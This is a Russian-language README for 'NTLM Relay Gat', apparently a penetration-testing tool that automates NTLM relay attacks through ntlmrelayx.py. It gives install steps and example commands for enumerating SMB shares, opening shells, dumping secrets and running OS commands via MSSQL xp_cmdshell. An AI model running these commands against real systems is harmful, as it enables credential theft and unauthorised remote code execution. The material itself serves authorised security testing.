
Автоматизирует эксплуатацию NTLM-ретрансляции с помощью ntlmrelayx.py для перечисления общих ресурсов SMB, выполнения командной оболочки, извлечения секретов и выполнения команд MSSQL через многопоточные сессии.

NTLM Relay Gat — мощный инструмент, предназначенный для автоматизации эксплуатации ретрансляции NTLM с помощью ntlmrelayx.py из набора инструментов Impacket. Используя возможности ntlmrelayx.py, NTLM Relay Gat упрощает процесс эксплуатации уязвимостей ретрансляции NTLM, предлагая ряд функций: от перечисления SMB-ресурсов до выполнения команд на базах данных MSSQL.
Перед началом убедитесь, что выполнены следующие условия:
proxychains правильно настроен на порт SOCKS-ретранслятора ntlmrelayxДля установки NTLM Relay Gat выполните следующие шаги:
Убедитесь, что в вашей системе установлен Python 3.6 или выше.
Клонируйте репозиторий NTLM Relay Gat:
git clone https://github.com/ad0nis/ntlm_relay_gat.git
cd ntlm_relay_gat
pip install -r requirements.txt
Теперь NTLM Relay Gat установлен и готов к использованию.
Чтобы использовать NTLM Relay Gat, убедитесь, что у вас есть ретранслированные сессии в выводе команды socks в ntlmrelayx.py, и что proxychains настроен на использование прокси ntlmrelayx.py, затем запустите скрипт с нужными параметрами. Вот несколько примеров запуска NTLM Relay Gat:
# Вывести доступные SMB-ресурсы, используя 10 потоков
python ntlm_relay_gat.py --smb-shares -t 10
# Запустить оболочку через SMB
python ntlm_relay_gat.py --smb-shell --shell-path /путь/к/оболочке
# Извлечь секреты из целевой системы
python ntlm_relay_gat.py --dump-secrets
# Вывести доступные базы данных MSSQL
python ntlm_relay_gat.py --mssql-dbs
# Выполнить команду операционной системы через xp_cmdshell
python ntlm_relay_gat.py --mssql-exec --mssql-method 1 --mssql-command 'whoami'
NTLM Relay Gat предназначен только для образовательных целей и этичного тестирования на проникновение. Использование NTLM Relay Gat для атак на цели без предварительного взаимного согласия является незаконным. Разработчики NTLM Relay Gat не несут ответственности и не отвечают за любое неправомерное использование или ущерб, причинённый этим инструментом.
Этот проект лицензирован на условиях лицензии MIT — подробности см. в файле LICENSE.